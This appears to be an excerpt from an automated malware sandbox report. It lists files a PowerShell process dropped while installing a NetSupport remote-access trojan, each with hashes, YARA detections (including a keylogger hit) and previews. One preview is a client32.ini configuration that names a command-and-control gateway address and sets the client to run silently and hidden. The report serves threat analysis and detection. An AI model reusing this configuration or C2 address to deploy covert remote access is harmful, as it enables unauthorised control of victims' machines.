                                                                            SSDEEP:24:3DWNn4SKco4KmBs4RPT6BmFoUe7u1omjKcm9qr9t7J0gt/NKmNmwr8HJYBlD3RB4:zWNn4SU4y4RQmFoUeCamfm9qr9tK8NfS
                                                                            MD5:3DBF3D5F5D6A95056B62408649E01725
                                                                            SHA1:272E78868CE282D692CB98D878A508FD2986A5EC
                                                                            SHA-256:7C50931C091BE0E0C57DCEC412C9B331C092B0BBAE63A2BC2BE0BFE561FCAC69
                                                                            SHA-512:ACAD6170C901B475DBD9054BD70BE342C50B266CC73C73CA478812CA42ADA332088E148217DAA4D8FFAD5557FB17DA9056F1BB5B43CE5E4F076BCEF4CBBE7E2A
                                                                            Malicious:false
                                                                            Reputation:low
                                                                            Preview:@...e...........8.....................R..............@..........H...............x..}...@..."~.u....... .System.IO.Compression.FileSystemH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.................0..~.J.R...L........System.Data.<...............i..VdqF...|...........System.ConfigurationH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<................$@...J....M+.B........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Commands.Ut

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_33jlajbv.reg.ps1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iee1bqo1.ghe.psm1

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):60
                                                                            Entropy (8bit):4.038920595031593
                                                                            Encrypted:false
                                                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                            Malicious:false
                                                                            Reputation:high, very likely benign file
                                                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):328056
                                                                            Entropy (8bit):6.7547459359511395
                                                                            Encrypted:false
                                                                            SSDEEP:6144:Hib5YbsXPKXd6ppGpwpbGf30IVFpSzyaHx3/4aY5dUilQpAf84lH0JYBAnM1OKB:Hib5YbsXioEgULFpSzya9/lY5SilQCfR
                                                                            MD5:C94005D2DCD2A54E40510344E0BB9435
                                                                            SHA1:55B4A1620C5D0113811242C20BD9870A1E31D542
                                                                            SHA-256:3C072532BF7674D0C5154D4D22A9D9C0173530C0D00F69911CDBC2552175D899
                                                                            SHA-512:2E6F673864A54B1DCAD9532EF9B18A9C45C0844F1F53E699FADE2F41E43FA5CBC9B8E45E6F37B95F84CF6935A96FBA2950EE3E0E9542809FD288FEFBA34DDD6A
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\HTCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 13%
                                                                            Joe Sandbox View:
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ ...A...A...A.......A...9...A...A..gA....1..A....0.A.......A.......A.......A..Rich.A..........PE..L.....V...........!.................Z.......................................P......._....@......................... ...k....y..x.......@...............x).......0..................................._..@............................................text............................... ..`.rdata..............................@..@.data....f.......(...v..............@....rsrc...@...........................@..@.reloc..b1.......2..................@..B........................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.LIC

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):195
                                                                            Entropy (8bit):4.924914741174998
                                                                            Encrypted:false
                                                                            SSDEEP:6:O/oPITDKHMoEEjLgpVUK+Odfu2M0M+ZYpPM/iotqO2La8l6i7s:XAyJjjqVUKHdW2MdRPM/iotq08l6J
                                                                            MD5:E9609072DE9C29DC1963BE208948BA44
                                                                            SHA1:03BBE27D0D1BA651FF43363587D3D6D2E170060F
                                                                            SHA-256:DC6A52AD6D637EB407CC060E98DFEEDCCA1167E7F62688FB1C18580DD1D05747
                                                                            SHA-512:F0E26AA63B0C7F1B31074B9D6EEF88D0CFBC467F86B12205CB539A45B0352E77CE2F99F29BAEAB58960A197714E72289744143BA17975699D058FE75D978DFD0
                                                                            Malicious:true
                                                                            Preview:1200..0x3ca968c5....[[Enforce]]....[_License]..control_only=0..expiry=01/01/2028..inactive=0..licensee=XMLCTL..maxslaves=9999..os2=1..product=10..serial_no=NSM303008..shrink_wrap=0..transport=0..

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\NSM.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Generic INItialization configuration [Features]
                                                                            Category:dropped
                                                                            Size (bytes):6458
                                                                            Entropy (8bit):4.645519507940197
                                                                            Encrypted:false
                                                                            SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                            MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                            SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                            SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                            SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                            Malicious:false
                                                                            Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):18808
                                                                            Entropy (8bit):6.292094060787929
                                                                            Encrypted:false
                                                                            SSDEEP:192:dogL7bo2t6n76RRHirmH/L7jtd3hfwjKd3hfwB7bjuZRvI:dogL7bo2YrmRTAKT0iTI
                                                                            MD5:104B30FEF04433A2D2FD1D5F99F179FE
                                                                            SHA1:ECB08E224A2F2772D1E53675BEDC4B2C50485A41
                                                                            SHA-256:956B9FA960F913CCE3137089C601F3C64CC24C54614B02BBA62ABB9610A985DD
                                                                            SHA-512:5EFCAA8C58813C3A0A6026CD7F3B34AD4FB043FD2D458DB2E914429BE2B819F1AC74E2D35E4439601CF0CB50FCDCAFDCF868DA328EAAEEC15B0A4A6B8B2C218F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICHEK.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 5%
                                                                            Joe Sandbox View:
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: updates.js, Detection: malicious, Browse
                                                                            • Filename: Update 124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: Update_124.0.6367.158.js, Detection: malicious, Browse
                                                                            • Filename: MDE_File_Sample_c035ea05c53efc10b65ede03b5550188cbb2e484.zip, Detection: malicious, Browse
                                                                            • Filename: update.js, Detection: malicious, Browse
                                                                            • Filename: Update_122.0.616.js, Detection: malicious, Browse
                                                                            • Filename: BILL93607.js, Detection: malicious, Browse
                                                                            • Filename: , Detection: malicious, Browse
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Yu....i...i...i.......i..Z...i.......i......i......i..l....i...h.~.i......i......i......i.......i.Rich..i.................PE..L....A.W...........!......................... ...............................`.......U....@.........................@#..r...h!..P....@............... ..x)...P......P ............................... ..@............ ..D............................text............................... ..`.rdata....... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):3740024
                                                                            Entropy (8bit):6.527276298837004
                                                                            Encrypted:false
                                                                            SSDEEP:49152:0KJKmPEYIPqxYdoF4OSvxmX3+m7OTqupa7HclSpTAyFMJa:0KJ/zIPq7F4fmXO8u6kS+y/
                                                                            MD5:D3D39180E85700F72AAAE25E40C125FF
                                                                            SHA1:F3404EF6322F5C6E7862B507D05B8F4B7F1C7D15
                                                                            SHA-256:38684ADB2183BF320EB308A96CDBDE8D1D56740166C3E2596161F42A40FA32D5
                                                                            SHA-512:471AC150E93A182D135E5483D6B1492F08A49F5CCAB420732B87210F2188BE1577CEAAEE4CE162A7ACCEFF5C17CDD08DC51B1904228275F6BBDE18022EC79D2F
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, Author: Joe Security
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\PCICL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J.>N+.mN+.mN+.m.eAmL+.mU.Gmd+.m!]rmF+.mU.EmJ+.mGSZmA+.mGS]mO+.mGSJmi+.mN+.m.(.mU.rm.+.mU.sm.+.mU.BmO+.mU.CmO+.mU.DmO+.mRichN+.m........................PE..L......X...........!.....(...$ .............@................................9.....Y.9.............................p................p................8.x)...`7.p....Q.......................c......@c..@............@..(.......`....................text...l'.......(.................. ..`.rdata..s....@.......,..............@..@.data....%... ......................@....tls.........P......................@....hhshare.....`......................@....rsrc........p......................@..@.reloc...3...`7..4....6.............@..B................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):396664
                                                                            Entropy (8bit):6.80911343409989
                                                                            Encrypted:false
                                                                            SSDEEP:12288:HqArkLoM/5iec2yxvUh3ho2LDnOQQ1k3+h9APjbom/n6:ekuK2XOjksobom/n6
                                                                            MD5:2C88D947A5794CF995D2F465F1CB9D10
                                                                            SHA1:C0FF9EA43771D712FE1878DBB6B9D7A201759389
                                                                            SHA-256:2B92EA2A7D2BE8D64C84EA71614D0007C12D6075756313D61DDC40E4C4DD910E
                                                                            SHA-512:E55679FF66DED375A422A35D0F92B3AC825674894AE210DBEF3642E4FC232C73114077E84EAE45C6E99A60EF4811F4A900B680C3BF69214959FA152A3DFBE542
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\TCCTL32.DLL, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 6%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............z..z..z.....z.....z.....z..{.Y.z....K.z......z.....z......z.....z.Rich.z.........PE..L....8.W...........!................'................................................P....@.............................o...D...x....0..@...............x)...@..\E..................................Pd..@...............h............................text............................... ..`.rdata..............................@..@.data...h............|..............@....rsrc...@....0......................@..@.reloc...F...@...H..................@..B................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\beta.identity_helper.exe.manifest

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1447
                                                                            Entropy (8bit):5.302827444337103
                                                                            Encrypted:false
                                                                            SSDEEP:24:2dt4uiNK+bIgMy5PYMPgiE/M7cJ3Zb2WF+HZ6iYzDfDJ6:cSVK+bIgMyRYSzIlz+HZ6XDfDJ6
                                                                            MD5:FFCF52AB3F76D8FB8E0C0ECA5F858F01
                                                                            SHA1:5EC475C9A55DA6684372373D6DFC5D13B3DE48CF
                                                                            SHA-256:8B6F3769FC0367421E2748C9775BBF16645B502621A8AEEF4974C58BFA067864
                                                                            SHA-512:0E64B1E26130E5A854BB3E321D529957CEE47BEC99D4A0E3A80FCF268661FD5F9DC96E2386FE3EE29654524D03CA900CC7A7CD2499742EB01711AA66DC2A03CB
                                                                            Malicious:false
                                                                            Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="*" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity>.. </dependentAssembly>.. </dependency>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"></supportedOS>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440225f93a}"></supportedOS>.. <supportedOS Id="{4a2f28e3-53b9-4441-ba9c-d69d4a4a6e38}"></supportedOS>.. <s

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):103824
                                                                            Entropy (8bit):6.674952714045651
                                                                            Encrypted:false
                                                                            SSDEEP:768:q78j0+RH6e6XhBBxUcnRWIDDDDDDDDDDDDDDDDADDDDDDDDDDDDDDDDDDDDDDXDU:qwpHLiLniepfxP91/bQxnu
                                                                            MD5:C4F1B50E3111D29774F7525039FF7086
                                                                            SHA1:57539C95CBA0986EC8DF0FCDEA433E7C71B724C6
                                                                            SHA-256:18DF68D1581C11130C139FA52ABB74DFD098A9AF698A250645D6A4A65EFCBF2D
                                                                            SHA-512:005DB65CEDAACCC85525FB3CDAB090054BB0BB9CC8C37F8210EC060F490C64945A682B5DD5D00A68AC2B8C58894B6E7D938ACAA1130C1CC5667E206D38B942C5
                                                                            Malicious:true
                                                                            Yara Hits:
                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.exe, Author: Joe Security
                                                                            Antivirus:
                                                                            • Antivirus: ReversingLabs, Detection: 26%
                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i.......i..6....i...h...i..6...i..6..i..6....i.Rich..i.........................PE..L....iMR.....................v...... ........ ....@.................................<h....@.................................< ..<....0...q...........|.............. ............................................... ...............................text............................... ..`.rdata..V.... ......................@..@.rsrc....q...0...r..................@..@.reloc..l............z..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\client32.ini

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):670
                                                                            Entropy (8bit):5.4168263644841295
                                                                            Encrypted:false
                                                                            SSDEEP:12:v6fxS2hz7YU+Sj8ZGShR8kkivlnxOZ7+DP981E7GXoKIDWQCYnmSulA4Ea:CfI2hzEPI8ZNR8pivlnxOoG1fXtID/Yd
                                                                            MD5:8684F84C76C111C4D47DD49106775030
                                                                            SHA1:620A70CB5D9A4E0D10B2D86EE0DDECDAAC1575B7
                                                                            SHA-256:C01152C4B80841F2A4900513FDED183F2DBD8D7D57E84744B0AE8E6068060C37
                                                                            SHA-512:4C5D39FFB3BF1BC0F50AEDF1B76B34CB1D47C87ED31102335280F1A48F9B289084F397A477F006999A43B7D024ADA4AE020330B41888E77F8320762AABAEBBF0
                                                                            Malicious:false
                                                                            Preview:0x39c9b7ae....[Client].._present=1..AlwaysOnTop=1..DisableChat=1..DisableChatMenu=1..DisableClientConnect=1..DisableCloseApps=0..DisableDisconnect=1..DisableManageServices=0..DisableReplayMenu=1..DisableRequestHelp=1..HideWhenIdle=1..Protocols=3..RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA..RoomSpec=Eval..silent=1..SKMode=1..SysTray=0..UnloadMirrorOnDisconnect=1..Usernames=*....[_Info]..Filename=C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.ini....[_License]..quiet=1....[Audio]..DisableAudioFilter=1....[General]..BeepUsingSpeaker=0....[HTTP]..GatewayAddress=194.180.191.69:443..gskmode=0..GSK=EL:M=OBKFDHG>CBDFIHM=HBG..GSKX=EIHJ=HBKHH;L>GCIFI;H>MCP..

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\initial_preferences

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
                                                                            Preview:.{"variations_compressed_seed":"H4sIAAAAAAAA\/+y9a5wc11UvOtU9M7a3JLu1ZctS6zUqS\/JIttrd1Y\/plu2EeWikaWukSffokcShVdW1p7s81VVNVfWMJg9uyAVCLpCQB4FAIIRXwiGJHQ6Pe4DLKzrAvQdyD4RLbjgcAhyegRwSOIdzknNuuL\/au6q6dr1bcmzLnuSDPF1r\/ffea639XnstMNNcnu++dmt5YSm\/vLC0tSzlNy8tzN5YXlgfXFpY3lpemN0821nqzM4++eRDKxerF7YGcvc1zyw9CZ9jwIOzSz2+gxqIF5G2jESJX5H5LaRVmfpZcOKyjlohBC3d4AUZtQr5fEYU9ocC1QsAzquKoamym2VM2A\/DWBr74a6ZSi6fK1bztVyhUMiOz8zkTk2lp8fhs54qX5FEpF4aGP2BEVxlF0FklV10SavsYmnsgzuHVa5wrhp\/gQEPzF5ZVAeKyBuSqszzfWOgoStclamfArvOKmYB4gV+oLS7GVF4MIS6\/jg4vKhqbSReUlqBFJkx4cFsCPMT4IjFvLYWzs0GczdOwF3Vai6fKxW5Uq5QqmR31Armn6VSKZefGptiplJT6WnmOgP\/JKKxx8HdC5KOW2u2E7702nkEjleruVNZqrVlqoG\/mQInZwWZN1AT8Vq7u6KpG5KItKu81hv0G+ibBkg39FlF1FRJrDL1ArjLMqXM\/n1\/8t9\/lxEOwmw4wFsZpr4D3LWA1viBbGQ4k9+ykMz+fZ\/H\/CCG\/yx4aCjAUMrMmHAwG4FUXwTHXKKMxGEjcBp74ESBK+ZOmWKcHu\/e\/KNfeG7yOgM\/nUiQC0hfN9S+V5B\/epuC\/LM7UZAH3IIcm2amU9Pp6Xscgf5GChyPF+jSpaZXmH9+m8L8T3eiMCmrnHCE+H0p8MAK30FLypo6K6gDY7Ur6U3JQFWmvugbrLks2N3sqptNvteXkSlRpBhwYo2X

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\ctlrvers.dat

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:ASCII text, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8
                                                                            Entropy (8bit):2.25
                                                                            Encrypted:false
                                                                            SSDEEP:3:SVyn:Ssn
                                                                            MD5:17412178172B24C5E570F6F13C42F4C0
                                                                            SHA1:F0AAC01BDD57F034D9CDA7DBEC9DD97C0DCB81EB
                                                                            SHA-256:2F2BB8B0A74E9049F4EE9DD039D81BC853FA8DB3F311A799032F002B9CC1DE41
                                                                            SHA-512:3B9808F22E3455505DA42B26D3C0C0D56CBAC41FD0D2076C3363273D9E77064047D8FC7B969612A5F5C78E0588F510DDD5B2173BE224B1B5EEDC5E51E9E5A92E
                                                                            Malicious:false
                                                                            Preview:1.0.1244

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\en-US.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):366601
                                                                            Entropy (8bit):5.662364865781263
                                                                            Encrypted:false
                                                                            SSDEEP:6144:vxWr2xoTIpupSwg1QMMXntfaY46yX1/PrMN8xKHfHqzHs:8r2WTqUl5MOnqavqY
                                                                            MD5:1761DC1760C752B6A16BF6F8797B207B
                                                                            SHA1:AE0C16AF795ADA3047F086DC841F66FF561FF139
                                                                            SHA-256:8C437A858E53894C6072D521459662FECEB3B1E416F62F3F4961D1F6C62B4C9D
                                                                            SHA-512:EBCE0FE7F70E4F8698B3A758C58309F461A25DDFFA413B8440EDFE593F70EE4D26046E3FE36EB1F01A4C0FA042270EAB29D2D717B0A02F1994870E1D9F4BBE09
                                                                            Malicious:false
                                                                            Preview:......... ..e.$...f.*...g.9...h.O...i.]...j.u...k.....l.....m.....n.....o.H...p.m...q.....r.....s.....t.....u.....v.....w.....x.....y.....z.....{.....|.(...}.,...~.;.....F.....N.....S.....`.....f.....n...........................................................................................................(.....0.....4.....;.....@.....V.....W.....^.....a.....d.....i.....o.....z.....~.................................................................%.....5.....>.....I.....U.....`.....{.................................................................%.....4.....N.....[.....h.....k...........................................................5.....i.....w.............................................................................,.....3.....<.....F.....O.....W.....f.....k.....w...............................................A.....M.....z.........".....#.....$.....%.....&.0...'.7...(.O...).g...+.v.../.....1.....2.....3.....4.....5.....6.....7.....8.....:.....<.!...=.H.....N...................

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\fr.pak

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):474195
                                                                            Entropy (8bit):5.557096749384389
                                                                            Encrypted:false
                                                                            SSDEEP:12288:EpFCZh0dne0ymuV8iObj/9XY441LSPwOi6PtQE0sIkcOBZfb9NVmEV//QpSY:EPC/9VVLcd/Qj
                                                                            MD5:DDFCAC89248FDC7C51C1A932B6AC1C37
                                                                            SHA1:B16577290A95346B74C84D95F3B3763219BE999C
                                                                            SHA-256:9FCB23EDFB0C68015EB5DC54B2FA48E2E5C3410FACD56547A33B6888EC71E079
                                                                            SHA-512:84E812C5E0FD0F61EC370D3751ED5F0059E62566E8BE125D705B37DCDB5A04B82399D531C261278D4E9292923EDBCE67B49CFCEB57263B83292C695F745732ED
                                                                            Malicious:false
                                                                            Preview:........&!..e.>...f.D...g.U...h.j...i.x...j.....k.....l.....m.....n.>...o.....p.....q.@...r.V...s.|...t.....u.....v.....w.....x.....y.....z.....{.....|.....}.....~.+.....6.....>.....C.....P.....V.....^.....o.....x.....................................................................................................&.....1.....7.....>.....D.....d.....e.....l.....o.....r.....y.................................................................:.....J.....o.........................................5.....P.....{.........................................&.....2.....H.....X.....k...........................................................X.....s.............................$.....<.....Q.....e.....w...........................................................0.....=.....A.....I.....T.....f.....k.....v...................................$.....F...........................".(...#.R...$.....%.....&.....'.....(.....).....*.&...+.0.../.I...1.[...2.b...3.u...4.....6.....7.....8.....:.....;.....<.....=.5.....=.

                                                                            C:\Users\user\AppData\Roaming\QCHBWPB-9\install\initial_preferences

                                                                            Download File
                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (65533), with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):613362
                                                                            Entropy (8bit):6.022362807465715
                                                                            Encrypted:false
                                                                            SSDEEP:12288:MyLOECzdyqLHl8ODcwPawFSoucO5JYhuFMZUpSFW7v1nq2w9b6qW3:kEqNLOODyoNNsqUpSFW7v4j9b6qW3
                                                                            MD5:D34FA84A88438C889B21D1AFA1D7348E
                                                                            SHA1:37905A3931BF2FAA104047408BAA3790AD4A5070
                                                                            SHA-256:98F0F679B47D1151C18064A44A8E097C338EBF1679A23EACC20740EC19852740
                                                                            SHA-512:F7B0CF48C4720F44EA2906CD3101A6C35CF690897ADD6CA66859EAC66B7129CA8805A85309E7747CC83ABB847C17424800D66AC2D4E55A44116F401998F2AC1D
                                                                            Malicious:false
